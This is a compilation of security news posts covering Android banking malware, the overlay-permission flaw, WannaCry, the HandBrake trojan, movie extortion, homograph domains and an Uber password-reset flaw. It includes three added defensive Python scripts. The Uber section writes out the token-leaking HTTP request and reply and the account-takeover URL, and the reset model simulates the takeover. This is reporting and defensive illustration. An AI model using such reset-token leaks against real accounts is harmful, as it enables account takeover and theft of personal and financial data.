Russian hackers rob a million from bank customers


A Russian cyber-crime group, "Cron", used malicious apps to infect around 1 million Android smartphones and steal 50 million roubles (around £677,000 or $892,000) from domestic bank customers. According to Group-IB, the cyber security firm investigating the attack with the Russian Interior Ministry, the group infected smartphones at a rate of 3,500 devices a day.


The group of 20 had acquired a more powerful piece of malware and was planning to expand the attack to major European banks before being arrested. The core members of the group were arrested on November 22 last year. The group had begun targeting the French banks Credit Agricole, BNP Paribas and Societe Generale, but no funds were stolen from their customers.


The Cron group, named after the malware it used, disguised the malware as fake banking applications, e-commerce apps and pornography web clients. When Android users in Russia searched online, the search engine results would suggest the fake apps and users would be tricked into downloading the phony version. Once in control of the infected smartphone, the hackers were able to send SMS messages to the victims' banks instructing transfers of up to $120 to one of 6,000 fraudulent accounts. They intercepted the transaction confirmation codes and suppressed the messages notifying victims of the transaction. The attack thereby bypassed two-factor authentication features that require a user to enter a secondary code, often sent via text message, to confirm their identity.

“Cron’s success was due to two main factors,” Dmitry Volkov, head of investigations at Group-IB, said in a statement. “First, the large-scale use of partner programs to distribute the malware in different ways. Second, the automation of many (mobile) functions which allowed them to carry out the thefts without direct involvement.”

They targeted customers of Sberbank, Alfa Bank, and online payments company Qiwi, exploiting SMS text message transfer services.

“Group-IB first learnt about Cron in March 2015: Group-IB’s Intelligence system tracked the activity of a new criminal group that was distributing malicious programs named ‘viber.apk’, ‘Google-Play.apk’, ‘Google_Play.apk’ for Android OS on underground forums,” explained the cyber security company.

The situation came to light when sources close to the investigation tipped off Reuters.

In June 2016 the Russian hackers rented "Tiny.z", a piece of malware designed to attack bank account systems, for $2,000 a month, and adapted it to target banks in Britain, Germany, France, the United States and Turkey, among other countries.

Luckily for the people with infected smartphones, and unfortunately for the hackers, only small sums can be transferred via SMS instructions, so despite the volume of devices affected, the amount of money the hackers stole was not astronomical.

A total of 16 people have been arrested thus far in relation to the case, including a 30-year old man who is believed to be the leader of the group operating across six different regions of Russia.

The case highlighted the dangers of relying on SMS messages in mobile banking. SMS banking services are used in Russia to help people living in isolated areas where access to banks is not easy, but security always has to outweigh consumer convenience.

Android flaw opens a path for malware to users, and will not be fixed for the time being

A security vulnerability in the Android operating system (OS) that lets malicious applications hijack a device's screen has reportedly left almost 40% of users exposed to ransomware, banking malware and adware, but Google says it won't be fixed for months.

The flaw was found in a core security mechanism of Android 6.0.0 (Marshmallow) and above, which according to official statistics is 38.3% of devices. Google has confirmed it knows about the issue but says the bug won't be fixed until the release of 'Android O' in Q3 2017.

According to experts at cybersecurity firm Check Point, the problem persists due to a Google policy which grants certain permissions to applications installed directly from the official Play Store.

The permission in question, "SYSTEM_ALERT_WINDOW", allows an app to draw its own windows on top of whatever else is on the device's screen (an "overlay").

This, as the researchers noted in a blog post this week (9 May), is one key method used by hackers and cybercriminals to trick unwitting Android users into falling for malware and phishing scams that can result in ransomware, banking Trojans and adware.

Check Point said more than 70% of ransomware (malware that locks a system until money is paid to the attacker), more than half of adware and about 15% of banking malware spreads by abusing this type of permission. "This is clearly not a minor threat," the researchers said.

In a previous temporary fix, Google released a patch for Android 6.0.1 that gave the Play Store app itself enhanced control over permissions, but it apparently backfired: if a malicious app was downloaded from Play it would be "automatically granted" the permission.

The researchers stated: "Since Google understood the problematic nature of this permission, it created a distinct process to approve it. This soon resulted in problems, as this permission is also used by legitimate applications, such as Facebook, which requires it for its Messenger chat."

While Google currently uses a system known as "Bouncer" to automatically scan apps in an attempt to fend off those containing malware, some can still slip through the cracks. Recently reported strains have included "BankBot" and "FalseGuide".

"Beware of fishy applications," the researchers warned, adding: "Users should always be wary of malicious applications, even when downloading from Google Play. Look at the comments left by other users, and only grant permissions which have relevant context for the app's purpose."
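A practical follow-up to that advice is to find out which installed packages actually hold the overlay permission. The script below is an added example (not code from the article, Check Point or Google): it parses the text printed by `adb shell dumpsys package` and lists every package whose "install permissions" block grants SYSTEM_ALERT_WINDOW, minus an allow-list of apps known to need it. The dumpsys excerpt embedded in the script is constructed to match the shape of that output, and the allow-list is an assumption made for the illustration. On Marshmallow and later the effective grant is an app-op rather than a plain install permission, so confirm any hit with `adb shell appops get <package> SYSTEM_ALERT_WINDOW`.

```python
"""List Android packages that hold SYSTEM_ALERT_WINDOW from `dumpsys package` output.

Added example, not from the original article or from Check Point/Google.
Run it offline against the constructed sample below, or feed it a device:
    adb shell dumpsys package | python3 overlay_triage.py
"""
import re
import sys

OVERLAY_PERM = "android.permission.SYSTEM_ALERT_WINDOW"

# Packages that plausibly need to draw over other apps (hypothetical allow-list).
# Anything else that holds the permission deserves a second look.
EXPECTED_OVERLAY_HOLDERS = {
    "com.facebook.orca",   # Messenger chat heads, the legitimate use the article mentions
}

# Shape of the relevant dumpsys lines (approximation of the real format):
#   Package [com.example.app] (1a2b3c):
#     install permissions:
#       android.permission.SYSTEM_ALERT_WINDOW: granted=true
PACKAGE_RE = re.compile(r"^\s*Package \[([^\]]+)\]")
PERM_RE = re.compile(r"^\s+(android\.permission\.[A-Z_]+): granted=(true|false)")


def parse_overlay_holders(dumpsys_text):
    """Return {package: granted_bool} for every package block that mentions the overlay permission."""
    holders = {}
    current = None
    for line in dumpsys_text.splitlines():
        pkg = PACKAGE_RE.match(line)
        if pkg:
            current = pkg.group(1)       # new package block starts
            continue
        perm = PERM_RE.match(line)
        if perm and current and perm.group(1) == OVERLAY_PERM:
            holders[current] = (perm.group(2) == "true")
    return holders


def suspicious_overlay_holders(dumpsys_text, allow_list=EXPECTED_OVERLAY_HOLDERS):
    """Packages granted the overlay permission that are not on the allow-list, sorted."""
    return sorted(pkg for pkg, granted in parse_overlay_holders(dumpsys_text).items()
                  if granted and pkg not in allow_list)


# Constructed sample in the shape of `dumpsys package` output (abridged, not a real device).
SAMPLE_DUMPSYS = """\
Packages:
  Package [com.facebook.orca] (1a2b3c):
    userId=10087
    install permissions:
      android.permission.INTERNET: granted=true
      android.permission.SYSTEM_ALERT_WINDOW: granted=true
  Package [com.example.flashlight] (4d5e6f):
    userId=10120
    install permissions:
      android.permission.INTERNET: granted=true
      android.permission.SYSTEM_ALERT_WINDOW: granted=true
      android.permission.RECEIVE_SMS: granted=true
  Package [com.android.chrome] (7a8b9c):
    userId=10055
    install permissions:
      android.permission.INTERNET: granted=true
"""

if __name__ == "__main__":
    text = SAMPLE_DUMPSYS if sys.stdin.isatty() else sys.stdin.read()
    for pkg in suspicious_overlay_holders(text):
        print("review overlay permission:", pkg)
```

A flashlight that can draw over other apps and also receive SMS is the combination the article's banking Trojans rely on, which is why the sample flags only that package.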

According to Android Police, a technology site, the Android "O" developer preview will go through four releases ahead of the final version, currently set to ship in Q3. An exact date has not been announced, but we recently got a look at Google's new Fuchsia OS.

Hackers Hit Russian Bank Customers, Planned to Hit Other European Banks

Russian hackers used malware planted on Android mobile devices to steal money from domestic bank customers using fake banking apps.

The group, known as 'Cron', is now in custody. It was planning a major attack on customers of leading European banks before the arrests.

According to reports compiled by cyber security firm Group-IB, which is investigating the case with the Russian Interior Ministry, the group tricked Android users into downloading malware via fake mobile banking applications, as well as via pornography and e-commerce apps.

Once installed on a phone, the malware blocked incoming messages and notifications from banks about transactions. As a result, users were not aware of any money transfers until they checked later.

The hackers had planned  to attack other  big European banks including France's Credit Agricole, BNP Paribas, and Societe Generale.

While Google has blocked this app, Android being an open OS makes it easy for hackers to find ways around its protections and plant malware.

Is North Korea behind WannaCry Attack?

For the recent string of cyber attacks that affected 300,000 computers in 150 countries earlier this month, a secretive unit is being blamed: according to sources, it is Unit 180, a secretive agency of North Korea. And the West has a real problem on its hands in North Korea's cyber warfare cell.

According to a cyber security expert, Unit 180, which forms part of the Reconnaissance General Bureau (RGB), North Korea's main overseas intelligence agency, has its eyes and ears on Australia and is trying to harm South Korean people, assets and aircraft in Australia. North Korea has recently threatened Australia with military attack as well, but right now it is the cyber attacks that are the main concern for Australia.

“North Korea is almost certainly conducting cyber espionage against South Korean targets here,” said Dr Greg Austin, a Professor at the Australian Centre for Cyber Security at the University of New South Wales, and he insisted that North Korea has a very active cyber presence in Australia.
According to Dr Austin, North Korea has 6,000 cyber warriors in the country and other cells active in northern China. Sometimes these operators are sent to countries such as China and parts of eastern Europe, where internet speeds are good, to attack financial and other security-related websites of the US, South Korea and various other countries. According to him, these units employ very young people who have been trained at their schools in cyber security.

“Unit 121 has 600 of its 1800 cyber staff dedicated to disabling South Korean military command and control in the event of war,” he told the seminar last week.

On the recent "WannaCry" incident, Dr Austin said that it cannot be confirmed that the global attack was carried out by North Korea's cyber cell.

“And if North Korea was behind the global attacks (WannaCry) then this could also affect Australia as well,” Dr Austin said.

Cyber security professionals have found technical evidence that could link North Korea with the WannaCry "ransomware" attack that affected more than 150 countries last week, but Pyongyang has called the allegation "ridiculous".

WannaCry started a new debate: how safe is a cashless society?

WannaCry ransomware has started a debate around the world about the safety of cyberspace.
After this attack, it is quite evident that no government, financial institution, anti-virus software developer or anyone else is really capable of stopping cyber attacks.

But still, governments around the world are trying to eliminate cash. How can people trust a cashless system given this state of cyber security?

Even if people move to digital payments, the next time ransomware like WannaCry hits cyberspace, nobody will be able to buy food.
Some of these essential and logical questions were addressed by ArmstrongEconomics.com:

"The WannaCry ransom attack is actually a variant of a February 2015 sample attributed to the Lazarus Group, a Kaspersky-tracked actor tied to the North Korean government. Parts of the code go beyond shared code. It appears to be written by the same programmer.

Let’s get something straight here. At the core of those responsible are really the NSA and Microsoft itself. The attack exploited a Windows networking protocol to spread within networks, and while Microsoft released a patch nearly two months ago, it’s become very clear that the patch didn’t reach all users, particularly because institutions often do not install patches, fearing that proprietary software may not function.

If behind the curtain we have governments demanding back-doors into iPhones and computers so they can listen to everything everywhere, well guess what – so can everyone else. Patches will work for individual users, but not major institutions. Trying to upgrade their operations is a real effort. They are slow to act and thus vulnerable.

The NSA was well aware of this little trick. The real answer is that the NSA and FBI must do their investigations the old-fashioned way. Stop asking for secret back-doors that never remain secret very long. The entire world will become vulnerable; they used to counterfeit an adversary’s currency to undermine their economy. Today, if we keep this nonsense up, they will hack into the entire thing and shut it down.

The idea of moving to a cashless society is just insane. Somebody has to give up something here. Trust me – the intelligence community will not take responsibility."

Rise in shares of Cyber Security stocks after WannaCry attack

There has been a sharp surge in cybersecurity stocks since the WannaCry ransomware hit at least 150 countries.

Cybersecurity stocks surged on Monday following a Friday cyberattack which hit at least 150 countries and affected computers in factories and hospitals.

"These attacks help focus the minds of chief technology officers across corporations to make sure security protocols are up to date, and you often see bookings growth at cybersecurity companies as a result," said Neil Campling, head of technology research at Northern Trust.

Cyber security stocks around the world were reported at all-time highs after the WannaCry attack.

In London, shares of Sophos (SOPH.L), a cloud network security firm, jumped more than 7 percent to a record high, and shares of NCC Group (NCCG.L), a security firm, rose 2.7 percent.

In the U.S., FireEye (FEYE.O) saw the biggest jump in its share price, while Symantec (SYMC.O) and Palo Alto Networks (PANW.N) rose around 3 percent.

The cyber security ETF (HACK.K) rose 3.3 percent.

According to cyber security firm PGI, spending on cyber security protection by companies in Britain and Europe will increase by 10 percent by 2020.

"In many companies, there's been an increase in investment in IT but not in the security that sits around it, so this investment is likely to play a bit of catch-up," the PGI report said.

DVD-ripping app HandBrake served malware after its download site was hacked

As if it weren't already difficult enough to avoid suspicious downloads, some hackers have figured out how to compromise even legitimate sources of software and turn them into sources of malware.

That was the case last week when it was discovered that HandBrake, a popular open source DVD-ripping and transcoding program, was delivering and installing the OSX.Proton malware through no fault of HandBrake itself. It all happened because someone managed to hack HandBrake's download site and replace a genuine copy of the program with an infected one.

The sign of a malware-infected copy of HandBrake would have escaped casual macOS users. When run, the fake copy of HandBrake asked for administrator privileges, something the clean program never did and never needed to do. If the unsuspecting user entered the requested credentials, consider the Mac compromised.

The good news is that the bogus copy of HandBrake has now been removed from the download site and replaced with a clean one. The bad news is that the situation isn't that simple. Many software sites publish checksums that users can use to verify that the copy they downloaded matches what the software authors uploaded. If the checksum doesn't match, then the download is either corrupted or you got a potentially tampered package.

In typical cases, that would be an adequate safeguard. But in this particular case, it was the site itself that was hacked. As such, the attacker could also have replaced those checksums with ones matching the tampered file. Unless HandBrake has worked out how the hack happened and put the necessary protections in place, users have very little assurance right now.

OSX.Proton is a known piece of malware that installs a backdoor on Macs. The slightly good news is that Proton itself appears to have been quite buggy and unreliable, sometimes failing to install its payload. It is almost a stroke of bad luck that HandBrake happens to be the second program from the same developer, the first being the BitTorrent client Transmission, to be hacked and used in this way.

Stealing movies for extortion - Baahubali 2 the latest victim

Baahubali 2 has become another victim of the extortion racket targeting movies. However, like a typical movie, this one seems to have had a happy ending. Sixteen perpetrators have been arrested for stealing a copy of Baahubali 2 and demanding a ransom from the producers of the movie, Arka Mediaworks Entertainment Ltd.

This greedy gang of sixteen threatened to publish the movie on the Internet, if a ransom was not paid. According to India.com, representatives of Arka Mediaworks refused to pay the blackmailers and immediately called the police.

As part of the tactics used to identify the perpetrators, the police asked Arka Mediaworks to play along and ask for proof that the movie had indeed been stolen. The perpetrators did not know that the copy of the film was "cleverly" marked for copy protection, and provided the company with a sample from the movie.

This allowed law enforcement agencies to trace the stolen copy to a specific theatre, whose owner was soon arrested. TorrentFreak notes that watermarks allow producers to track exactly where a cam-copy of a movie was made, but in this case the attackers had a digital copy of the film. This suggests that the perpetrators had managed to obtain the encryption key required to decrypt the content (the movie, in this case).

While the owner of the theatre was one of the sixteen arrested, it also emerged that two of those arrested had been detained in 2015 as well for dealing in pirated copies of Baahubali 1. Old habits do die hard...

The Baahubali incident was not an isolated one. In recent months, hackers put 10 episodes of the new season of the series "Orange Is The New Black" on the internet. The hacker(s), known as The Dark Overlord, are said to have stated that representatives of Netflix and Larson Studios refused to pay the ransom, hence the online posting in retaliation.

Hackers have also reportedly sought to blackmail Disney by threatening to release the latest movie in the Pirates of the Caribbean franchise, Dead Men Tell No Tales.


- Christina

Fake website "шһатѕарр.com" masquerades as WhatsApp.com

Reddit users have recently noticed a new malicious campaign targeting users of the WhatsApp messenger. Apparently, attackers have been sending victims links supposedly leading to the official website of WhatsApp (whatsapp.com), while in reality the links lead to the look-alike domain шһатѕарр.com, spelled with Cyrillic letters.

Click on the link and one is presented with an invitation to trouble. The "clicker" is redirected to the fake site and offered an exciting app to make messages colourful.

Users are asked to share the link with friends and groups on social networks, ostensibly to confirm that the user is not a robot. For all this trouble, victims are "gifted" with adware instead of coloured WhatsApp messages.

However, in what is surely a relief, Google has already removed the app from the Chrome Web Store. This is not the first time that attackers have used international characters and Unicode domain names. Previously, google.com was imitated by ɢoogle.com (with a Latin small capital G in place of the g).

In April 2017, Chinese expert Xudong Zheng warned that Chrome, Firefox and Opera were vulnerable to virtually undetectable phishing attacks in which attackers register fake domains that look indistinguishable from the real sites of Apple, Google, eBay, Amazon and many other companies.
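A check that catches both look-alikes mentioned above, as an added example that is not from the article or from Xudong Zheng's report: it computes the punycode ("xn--") form a browser would actually resolve, records which Unicode scripts the label uses, and folds visually confusable letters to their Latin counterparts so the result can be compared with a list of protected brand names. The confusables table is a small hand-built subset of the Unicode confusables data (UTS #39), the protected-label set is an assumption, and the sample hostnames are constructed from the two domains the article cites.

```python
"""Flag homograph domains such as шһатѕарр.com that impersonate a known brand.

Added example, not from the original article or from Xudong Zheng's report.
CONFUSABLES is a small hand-built subset of the Unicode confusables data,
enough for the two domains the article mentions; use the full UTS #39 table
for a production check.
"""
import unicodedata

# Look-alike letter -> Latin letter it resembles (partial, constructed for this example).
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0455": "s", "\u0456": "i", "\u0458": "j",
    "\u04bb": "h", "\u0501": "d", "\u051b": "q", "\u051d": "w",
    "\u0448": "w",   # Cyrillic sha: close enough to "w" to fool users in the WhatsApp case
    "\u0442": "t",   # Cyrillic te
    "\u0262": "g",   # Latin small capital G, as in the earlier ɢoogle.com look-alike
}


def to_wire_form(label: str) -> str:
    """What actually goes on the wire: ASCII unchanged, otherwise xn-- plus punycode."""
    if label.isascii():
        return label
    return "xn--" + label.encode("punycode").decode("ascii")


def scripts_in(label: str) -> set:
    """First word of each letter's Unicode name: LATIN, CYRILLIC, GREEK, ..."""
    return {unicodedata.name(ch, "UNKNOWN").split(" ")[0] for ch in label if ch.isalpha()}


def skeleton(label: str) -> str:
    """Fold confusable letters to their Latin look-alikes."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in unicodedata.normalize("NFKC", label))


def homograph_verdict(hostname: str, protected_labels) -> dict:
    """Check the leftmost label of a hostname against a set of brand labels.

    The WhatsApp look-alike is entirely Cyrillic, so a mixed-script rule (what the
    browsers apply) never fires; comparing the skeleton with known brands does.
    """
    label = hostname.split(".")[0].lower()
    wire = to_wire_form(label)
    skel = skeleton(label)
    return {
        "label": label,
        "wire_form": wire,
        "scripts": scripts_in(label),
        "impersonates": skel if (wire != label and skel in protected_labels) else None,
    }


PROTECTED_LABELS = {"whatsapp", "google", "apple", "amazon", "ebay"}   # assumed list

# Constructed samples: the article's two look-alikes and the genuine domain.
FAKE_WHATSAPP = "\u0448\u04bb\u0430\u0442\u0455\u0430\u0440\u0440.com"   # шһатѕарр.com
FAKE_GOOGLE = "\u0262oogle.com"                                          # ɢoogle.com

if __name__ == "__main__":
    for host in (FAKE_WHATSAPP, FAKE_GOOGLE, "whatsapp.com"):
        print(homograph_verdict(host, PROTECTED_LABELS))
```

The "wire_form" field is what to look for in proxy or DNS logs: a request for an `xn--` name whose skeleton equals one of your brands is the signal, whether or not the user's browser chose to display it in Unicode.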

- Christina

Improper Authentication vulnerability allowed anyone to reset the password of any Uber account

Italian security researcher Vincenzo C., known on Twitter as @Procode701, discovered a critical authentication vulnerability in Uber by which anyone could reset the password for any account.

The researcher found the 'Improper Authentication' vulnerability through the company's bug bounty program, which is run on HackerOne.

A summary published by the UBER explains, “With an email address for a valid Uber account, it was possible to take over that account because the reset token was exposed in the response of a password reset HTTP request. This meant an attacker could initiate password reset for an account and immediately receive the reset token for that account.”

“We consider the security of our user’s data top priority, so we were very interested in this report. Furthermore, @procode701 was a pleasure to work with and we look forward to more reports in the future.”

The researcher found that the password reset endpoint could be made to return an authentication token, "inAuthSessionID", and that anyone could then use it to change the password for any account.

Here is the UBER Improper Authentication flaw

To change the password for any account you just need to obtain a session token, "inAuthSessionID", and then, using the standard link that is present in the change-password form, you can easily change the password. The link has the form:

https://auth.uber.com/login/stage/<inAuthSessionID>/af9b9d0c-bb98-41de-876c-4cb911c79bd1

where the first path segment is the inAuthSessionID that would normally only reach the user through the change-password email, and the second, af9b9d0c-bb98-41de-876c-4cb911c79bd1, is a token ID with no expiration date. The request that leaks the session token and the reply it produces:

Request:
POST /login/handleanswer HTTP/1.1
Host: auth.uber.com

{
  "init": false,
  "answer": {
    "type": "PASSWORD_RESET_WITH_EMAIL",
    "userIdentifier": {
      "email": "xxxx@uber.com"
    }
  }
}

Reply:
HTTP/1.1 200 OK

{
  "inAuthSessionID": "cdc1a741-0a8b-4356-8995-8388ab4bbf28",
  "stage": {
    "question": {
      "signinToken": "",
      "type": "VERIFY_PASSWORD_RESET",
      "tripChallenges": []
    },
    "alternatives": []
  }
}

The impact of this vulnerability is very severe: it allowed an attacker to access any account and any user's data (ID card, banking data, driver's license), including financial information.
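To make the defect and the fix concrete, here is an added example that models the flow above; it is not Uber's code. A reset handler that hands the reset secret back in its JSON response sits next to one that returns only an opaque session identifier and sends the secret to the account's email address, stored hashed, single-use and with an expiry. The field names inAuthSessionID and PASSWORD_RESET_WITH_EMAIL come from the page; the in-memory account store, the send_email hook, the placeholder reset URL and the 15-minute lifetime are assumptions made for the illustration.

```python
"""Password-reset flow: the reported token leak next to a fixed version.

Added example modelling the reported behaviour; this is not Uber's code.
Field names inAuthSessionID / PASSWORD_RESET_WITH_EMAIL are from the page;
the store, the send_email hook, the reset URL and the TTL are assumptions.
"""
import secrets
import time
from hashlib import sha256

RESET_TTL_SECONDS = 15 * 60   # assumed; the page says the real token never expired


class ResetService:
    def __init__(self, accounts, send_email, clock=time.time):
        self.accounts = accounts        # email -> {"password": ...}
        self.send_email = send_email    # side channel the requester cannot read
        self.clock = clock
        self._tokens = {}               # sha256(token) -> (email, issued_at or None)

    @staticmethod
    def _email_from(request):
        answer = request.get("answer", {})
        if answer.get("type") != "PASSWORD_RESET_WITH_EMAIL":
            return None
        return answer.get("userIdentifier", {}).get("email")

    def _issue_token(self, email, issued_at):
        token = secrets.token_urlsafe(32)
        self._tokens[sha256(token.encode()).hexdigest()] = (email, issued_at)  # store only the hash
        return token

    # ---- vulnerable: the reset secret is handed back to whoever asked ------
    def vulnerable_handle_answer(self, request):
        email = self._email_from(request)
        if email not in self.accounts:
            return {"error": "unknown user"}
        token = self._issue_token(email, issued_at=None)   # never expires
        # Bug: the secret that should only reach the inbox is in the HTTP response.
        return {"inAuthSessionID": token,
                "stage": {"question": {"type": "VERIFY_PASSWORD_RESET"}}}

    # ---- fixed: opaque session id in the response, secret only by email ----
    def fixed_handle_answer(self, request):
        email = self._email_from(request)
        if email in self.accounts:
            token = self._issue_token(email, issued_at=self.clock())
            self.send_email(email, "https://example.invalid/reset/" + token)  # placeholder URL
        # Same reply whether or not the account exists: no secret, no enumeration.
        return {"inAuthSessionID": secrets.token_urlsafe(16),
                "stage": {"question": {"type": "VERIFY_PASSWORD_RESET"}}}

    def complete_reset(self, token, new_password):
        """Consume a token once; reject unknown, replayed or expired tokens."""
        entry = self._tokens.pop(sha256(token.encode()).hexdigest(), None)
        if entry is None:
            return False
        email, issued_at = entry
        if issued_at is not None and self.clock() - issued_at > RESET_TTL_SECONDS:
            return False
        self.accounts[email]["password"] = new_password
        return True


def attacker_takes_over(service, victim_email, handler):
    """Start a reset for someone else's address and try to use whatever the
    response returns as inAuthSessionID to set a new password."""
    request = {"init": False,
               "answer": {"type": "PASSWORD_RESET_WITH_EMAIL",
                          "userIdentifier": {"email": victim_email}}}
    return service.complete_reset(handler(request)["inAuthSessionID"], "attacker-chosen")


if __name__ == "__main__":
    inbox = []
    svc = ResetService({"victim@example.com": {"password": "original"}},
                       lambda to, body: inbox.append((to, body)))
    print("vulnerable handler, takeover:", attacker_takes_over(svc, "victim@example.com", svc.vulnerable_handle_answer))
    print("fixed handler, takeover:     ", attacker_takes_over(svc, "victim@example.com", svc.fixed_handle_answer))
```

The fixed handler still returns an inAuthSessionID, because the client needs something to continue the flow with; the difference is that the value is worthless on its own. Whatever proves possession of the mailbox travels only through the mailbox, is stored hashed so a database read does not yield usable tokens, and is consumed on first use.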